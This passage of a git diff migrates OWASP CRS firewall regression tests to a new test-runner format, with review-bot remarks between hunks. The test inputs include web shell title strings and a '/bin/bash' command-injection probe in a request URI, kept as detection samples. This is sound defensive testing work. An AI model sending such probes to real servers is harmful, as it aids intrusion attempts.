.:NCC:. Shell v"} - output: - log_contains: "id \"955100\"" - - test_title: 955100-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.1" + uri: "/reflect" + data: |- + {"body": "

.:NCC:. Shell v"} + output: + log: + expect_ids: [955100] + - test_id: 2 desc: "Matching web shell Simple PHP backdoor" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.1" - uri: "/reflect" - data: |- - {"body": ""} - output: - log_contains: "id \"955100\"" - - test_title: 955100-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.1" + uri: "/reflect" + data: |- + {"body": ""} + output: + log: + expect_ids: [955100] + - test_id: 3 desc: "Matching web shell WinX Shell" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.1" - uri: "/reflect" - data: |- - {"body": "-:[GreenwooD]:- WinX Shell"} - output: - log_contains: "id \"955100\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.1" + 
uri: "/reflect" + data: |- + {"body": "-:[GreenwooD]:- WinX Shell"} + output: + log: + expect_ids: [955100] diff --git a/tests/regression/tests/RESPONSE-955-WEB-SHELLS/955260.yaml b/tests/regression/tests/RESPONSE-955-WEB-SHELLS/955260.yaml index 68483c2cf..4098fec7a 100644 --- a/tests/regression/tests/RESPONSE-955-WEB-SHELLS/955260.yaml +++ b/tests/regression/tests/RESPONSE-955-WEB-SHELLS/955260.yaml @@ -1,27 +1,25 @@ --- meta: author: "azurit" - enabled: true - name: "955260.yaml" - description: "Regression tests for rule 955260" +rule_id: 955260 tests: - - test_title: 955260-1 + - test_id: 1 desc: "Matching web shell Ru24PostWebShell. Our test infrastructure, currently, cannot run this test properly because of multiline output, so it's disabled." stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.1" - uri: "/reflect" - data: "{\"body\": \"\\n\\nRu24PostWebShell -\"}" - output: - log_contains: "id \"955260\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.1" + uri: "/reflect" + data: "{\"body\": \"<html>\\n<head>\\n<title>Ru24PostWebShell -\"}" + output: + log: + expect_ids: [955260] diff --git a/tests/regression/tests/RESPONSE-959-BLOCKING-EVALUATION/959100.yaml b/tests/regression/tests/RESPONSE-959-BLOCKING-EVALUATION/959100.yaml index 46a3b5433..1f1dbe8ab 100644 
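Review bot: The `desc` for test 1 still states that the test "cannot run properly because of multiline output, so it's disabled", but nothing on the new side of the hunk marks it as disabled, and the file-level `enabled: true` that the old meta carried has been removed rather than replaced. Either the test now runs under go-ftw 1.x and the sentence should be dropped, or it needs to be disabled through whatever mechanism the new format provides; as written the comment and the behaviour disagree. It is also worth confirming that the `expect_ids: [955260]` assertion passes given the multiline `<html>\n<head>\n<title>` payload the new side sends.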
--- a/tests/regression/tests/RESPONSE-959-BLOCKING-EVALUATION/959100.yaml +++ b/tests/regression/tests/RESPONSE-959-BLOCKING-EVALUATION/959100.yaml 
@@ -1,72 +1,71 @@ --- meta: author: "studersi, azurit" - enabled: true - name: "959100.yaml" description: | Test whether the outbound blocking mechanism works by testing whether rule 959100 is triggered. For these tests, existing test are repurposed with different assertions. Instead of asserting that the original rules are triggered that the tests are written for, we assert that triggering these rules causes the blocking rule to be triggered. +rule_id: 959100 tests: - - test_title: 959100-1 + - test_id: 1 desc: Test is basically identical to 953120-1 (PHP leakage positive test in phase 4) but here we assert that the outbound blocking mechanism is triggered stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: "{\"body\": \"<?php echo \\\"Hello World!\\n\\\" ?>\"}" - output: - log_contains: "id \"959100\"" - - test_title: 959100-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: "{\"body\": \"<?php echo \\\"Hello World!\\n\\\" ?>\"}" + output: + log: + expect_ids: [959100] + - test_id: 2 desc: Test is basically identical to 953120-1 (PHP leakage negative test in phase 4) but here we assert that the outbound blocking mechanism is not triggered stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test 
agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "<?php12345"} - output: - no_log_contains: "id \"959100\"" - - test_title: 959100-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "<?php12345"} + output: + log: + no_expect_ids: [959100] + - test_id: 3 desc: Test is basically identical to 959100-1 (see above) but here we assert that the scores are summed up and reported properly stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: "{\"body\": \"<?php echo \\\"Hello World!\\n\\\" ?>\"}" - output: - log_contains: "Outbound Anomaly Score Exceeded [(]Total Score: " + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: "{\"body\": \"<?php echo \\\"Hello World!\\n\\\" ?>\"}" 
+ output: + log: + match_regex: 'Outbound Anomaly Score Exceeded \(Total Score: ' diff --git a/tests/regression/tests/RESPONSE-980-CORRELATION/980170.yaml b/tests/regression/tests/RESPONSE-980-CORRELATION/980170.yaml index df07008b4..027c14df7 100644 --- a/tests/regression/tests/RESPONSE-980-CORRELATION/980170.yaml +++ b/tests/regression/tests/RESPONSE-980-CORRELATION/980170.yaml 
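Review bot: The `desc` strings in this file cross-reference other tests by the old `test_title` form (`953120-1`, `959100-1`), which this commit replaces with per-file `test_id` numbers, so the references no longer name anything that exists; the same applies to `920350-1` in the 980170 hunk. Test 2's desc additionally calls `953120-1` a "negative test" while test 1's desc calls the same id a positive test, so at least one of them is wrong. Consider rewording to `rule 953120, test 1` style references and fixing the positive/negative mismatch. For test 3, if the schema allows it, pairing `match_regex` with `expect_ids: [959100]` in the same `log` block would also pin that the score message comes from the expected rule.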
@@ -1,78 +1,77 @@ --- meta: author: "studersi, azurit" - enabled: true - name: "980170.yaml" description: | Test whether level 4 inbound reporting in phase 5 works by testing whether rule 980170 is triggered. For these tests, existing test are repurposed with different assertions. Instead of asserting that the original rules are triggered that the tests are written for, we assert that triggering these rules causes the corresponding reporting rules to be triggered. +rule_id: 980170 tests: - - test_title: 980170-1 + - test_id: 1 desc: Test is similar to 920350-1 but here we check if at reporting level 4 a request is logged that was blocked stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "127.0.0.1" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - # Will match rules - # - 920273: restricted characters violation - # - 920350: numeric IP in Host header - # - 932160: Unix remote command execution - # - 932236: Unix command injection - # - 932260: Unix remote command execution - uri: "/get?a=/bin/bash" - version: "HTTP/1.1" - output: - # Phase 5 rules are prone to a race condition when parsing log output. - # Retry the test once if it fails to work around this issue. - # See https://github.com/coreruleset/go-ftw/issues/141. 
- retry_once: true - log_contains: "id \"980170\"" - - test_title: 980170-2 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "127.0.0.1" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + # Will match rules + # - 920273: restricted characters violation + # - 920350: numeric IP in Host header + # - 932160: Unix remote command execution + # - 932236: Unix command injection + # - 932260: Unix remote command execution + uri: "/get?a=/bin/bash" + version: "HTTP/1.1" + output: + # Phase 5 rules are prone to a race condition when parsing log output. + # Retry the test once if it fails to work around this issue. + # See https://github.com/coreruleset/go-ftw/issues/141. + retry_once: true + log: + expect_ids: [980170] + - test_id: 2 desc: Test is similar to 920350-1 but here we check if at reporting level 4 a request is logged that scored but was not blocked stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - # Will match rule 920350: numeric IP in Host header - Host: "127.0.0.1" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - # Phase 5 rules are prone to a race condition when parsing log output. - # Retry the test once if it fails to work around this issue. - # See https://github.com/coreruleset/go-ftw/issues/141. 
- retry_once: true - log_contains: "id \"980170\"" - - test_title: 980170-3 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + # Will match rule 920350: numeric IP in Host header + Host: "127.0.0.1" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + # Phase 5 rules are prone to a race condition when parsing log output. + # Retry the test once if it fails to work around this issue. + # See https://github.com/coreruleset/go-ftw/issues/141. + retry_once: true + log: + expect_ids: [980170] + - test_id: 3 desc: Test is similar to 920350-1 but here we check if at reporting level 4 a request is not logged that did not score stages: - - stage: - input: - dest_addr: "localhost" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - # Phase 5 rules are prone to a race condition when parsing log output. - # Retry the test once if it fails to work around this issue. - # See https://github.com/coreruleset/go-ftw/issues/141. - retry_once: true - no_log_contains: "id \"980170\"" + - input: + dest_addr: "localhost" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + # Phase 5 rules are prone to a race condition when parsing log output. + # Retry the test once if it fails to work around this issue. + # See https://github.com/coreruleset/go-ftw/issues/141. + retry_once: true + log: + no_expect_ids: [980170] 
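Review bot: The `Accept` header on the new side of all three tests is left as a plain scalar containing `*/*;q=0.5`, while every other converted file in this commit quotes that value; a plain scalar with `*`, `;` and `,` parses today but is fragile and inconsistent. Suggest `Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"` in each stage. The `retry_once` comment block is duplicated verbatim three times; a single note at file level would be easier to keep current.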
diff --git a/tests/regression/tests/base_positive_rules.py b/tests/regression/tests/base_positive_rules.py index 2617ad7a7..a9fafe931 100755 --- a/tests/regression/tests/base_positive_rules.py +++ b/tests/regression/tests/base_positive_rules.py @@ -18,8 +18,6 @@ Meta='''--- meta: author: "spartantri" - enabled: true - name: "skeletonid.yaml" description: "Positive tests for rule skeletonid" tests: ''' diff --git a/tests/regression/tests/positivetest-light.yaml.skeleton b/tests/regression/tests/positivetest-light.yaml.skeleton index 65ca49569..ab0842f9f 100644 --- a/tests/regression/tests/positivetest-light.yaml.skeleton +++ b/tests/regression/tests/positivetest-light.yaml.skeleton 
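Review bot: The `Meta` template drops `enabled` and `name` but does not add the top-level `rule_id` key that every hand-written test file in this commit now carries, so generated skeletons would be missing it if the new format requires it. Suggest adding `rule_id: skeletonid` to the template between the `description` line and `tests:`, assuming the same substitution that fills `skeletonid` elsewhere applies. The `Meta` string is only partly visible in this hunk, so check that no other consumer still expects the removed `name` key.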
@@ -1,255 +1,236 @@ - - - test_title: skeletonid-skeletontest + - test_id: 1 desc: "Argument test includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=skeletonkeyword" - output: - log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=skeletonkeyword" + output: + log: + expect_ids: [skeletonid] - - - test_title: skeletonid-skeletontest + - test_id: 2 desc: "Argument name includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "skeletondefaultcontenttype" - method: "POST" - version: "HTTP/1.0" - data: "skeletonkeyword=test" - output: - log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + 
Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "skeletondefaultcontenttype" + method: "POST" + uri: / + version: "HTTP/1.0" + data: "skeletonkeyword=test" + output: + log: + expect_ids: [skeletonid] - - - test_title: skeletonid-skeletontest + - test_id: 3 desc: "Cookie test includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "skeletondefaultcontenttype" - Cookie: test=skeletonkeyword - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "skeletondefaultcontenttype" + Cookie: test=skeletonkeyword + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [skeletonid] - - - test_title: skeletonid-skeletontest + - test_id: 4 desc: "Cookie name includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: 
"skeletondefaultcontenttype" - Cookie: skeletonkeyword=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "skeletondefaultcontenttype" + Cookie: skeletonkeyword=test + method: "POST" + uri: / + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [skeletonid] - - - test_title: skeletonid-skeletontest + - test_id: 5 desc: "Request header test includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "skeletondefaultcontenttype" - test: skeletonkeyword - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "skeletondefaultcontenttype" + test: skeletonkeyword + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [skeletonid] - - - test_title: skeletonid-skeletontest + - test_id: 6 desc: "XML attribute value includes keyword skeletonkeyword" stages: - - - 
stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"skeletonkeyword\">element_value</element></xml>" - output: - log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "application/xml" + method: "POST" + uri: / + version: "HTTP/1.0" + data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"skeletonkeyword\">element_value</element></xml>" + output: + log: + expect_ids: [skeletonid] - - - test_title: skeletonid-skeletontest + - test_id: 7 desc: "XML element value includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">skeletonkeyword</element></xml>" - output: - log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: 
"skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">skeletonkeyword</element></xml>" + output: + log: + expect_ids: [skeletonid] - - - test_title: skeletonid-skeletontest + - test_id: 8 desc: "Nested XML element value includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">skeletonkeyword</element></l3></l2></l1></xml>" - output: - log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">skeletonkeyword</element></l3></l2></l1></xml>" + output: + log: + expect_ids: [skeletonid] - - - test_title: skeletonid-skeletontest + - test_id: 9 desc: "Content-Type text/plain includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport 
- headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=skeletonkeyword" - output: - log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=skeletonkeyword" + output: + log: + expect_ids: [skeletonid] - - - test_title: skeletonid-skeletontest + - test_id: 10 desc: "Content-Type application/json arg value includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"skeletonkeyword\"}" - output: - log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": 
\"skeletonkeyword\"}" + output: + log: + expect_ids: [skeletonid] - - - test_title: skeletonid-skeletontest + - test_id: 11 desc: "Content-Type application/json arg name includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"skeletonkeyword\": \"test\"}" - output: - log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"skeletonkeyword\": \"test\"}" + output: + log: + expect_ids: [skeletonid]
diff --git a/tests/regression/tests/positivetest.yaml.skeleton b/tests/regression/tests/positivetest.yaml.skeleton
index 83f0b2dee..4391b960c 100644
--- a/tests/regression/tests/positivetest.yaml.skeleton
+++ b/tests/regression/tests/positivetest.yaml.skeleton
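Review bot: `uri: /` is added only to test_id 2, 4 and 6 of positivetest-light.yaml.skeleton (the `+ uri: /` lines between `method: "POST"` and `version: "HTTP/1.0"`), while the other eight tests in this hunk and every test in the visible part of the positivetest.yaml.skeleton hunk omit it. Either the go-ftw 1.x stage schema defaults `uri` to `/`, in which case those three lines are redundant, or it does not, in which case the remaining generated tests send a request with no URI; confirm which and make the skeleton uniform so every rule's positive tests exercise the same request shape. If the key is kept, quote it as `uri: "/"` to match the quoted `uri: "/get"` style used by the hand-written tests elsewhere in this diff. It is also worth confirming that the generator in base_positive_rules.py no longer substitutes `skeletontest`, since the `test_title: skeletonid-skeletontest` placeholder it targeted has been replaced by fixed numeric `test_id` values.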
@@ -1,393 +1,359 @@ - - - test_title: skeletonid-skeletontest + - test_id: 1 desc: "Argument test includes keyword skeletonkeyword" stages: - - - stage: - input: - dest_addr: "skeletondefaultaddr" - port: skeletondefaultport - headers: - Host: "skeletondefaulthost" - User-Agent: "skeletondefaultuseragent" - Accept: "skeletondefaultaccept" - Accept-Charset: "skeletondefaultacceptcharset" - Accept-Encoding: "skeletondefaultacceptencoding" - Accept-Language: "skeletondefaultacceptlanguage" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=skeletonkeyword" - output: - log_contains: "id \"skeletonid\"" + - input: + dest_addr: "skeletondefaultaddr" + port: skeletondefaultport + headers: + Host: "skeletondefaulthost" + User-Agent: "skeletondefaultuseragent" + Accept: "skeletondefaultaccept" + Accept-Charset: "skeletondefaultacceptcharset" + Accept-Encoding: "skeletondefaultacceptencoding" + Accept-Language: "skeletondefaultacceptlanguage" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=skeletonkeyword" + output: + log: + expect_ids: [skeletonid] - - - test_title: skeletonid-skeletontest + - test_id: 2 desc: "Argument name includes keyword skeletonkeyword" stages: - - - stage: - input: - 